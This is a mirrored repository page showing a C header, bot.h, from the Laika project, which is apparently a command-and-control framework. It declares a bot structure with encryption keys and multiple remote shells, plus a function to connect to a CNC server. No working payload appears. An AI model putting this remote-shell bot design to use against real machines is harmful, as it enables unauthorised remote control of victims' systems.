mirror of
https://github.com/CPunch/Laika.git
synced 2024-11-13 01:10:05 +00:00
CPunch
7d96f3252c
- can now open multiple shells per peer (change LAIKA_MAX_SHELLS) - more sanity checking for public keys (new peers with duplicate keys are killed - misc. refactoring, added cnc/cpeer.[ch]
31 lines
870 B
C
31 lines
870 B
C
#ifndef LAIKA_BOT_H
|
|
#define LAIKA_BOT_H
|
|
|
|
#include "laika.h"
|
|
#include "lpacket.h"
|
|
#include "lsocket.h"
|
|
#include "lpeer.h"
|
|
#include "ltask.h"
|
|
#include "lpolllist.h"
|
|
#include "lsodium.h"
|
|
|
|
struct sLaika_shell;
|
|
struct sLaika_bot {
|
|
uint8_t priv[crypto_kx_SECRETKEYBYTES], pub[crypto_kx_PUBLICKEYBYTES];
|
|
struct sLaika_shell *shells[LAIKA_MAX_SHELLS];
|
|
struct sLaika_pollList pList;
|
|
struct sLaika_taskService tService;
|
|
struct sLaika_peer *peer;
|
|
struct sLaika_task *shellTask;
|
|
int activeShells;
|
|
};
|
|
|
|
struct sLaika_bot *laikaB_newBot(void);
|
|
void laikaB_freeBot(struct sLaika_bot *bot);
|
|
|
|
void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port); /* can throw a LAIKA_ERROR */
|
|
bool laikaB_poll(struct sLaika_bot *bot);
|
|
|
|
void laikaB_pingTask(struct sLaika_taskService *service, struct sLaika_task *task, clock_t currTick, void *uData);
|
|
|
|
#endif |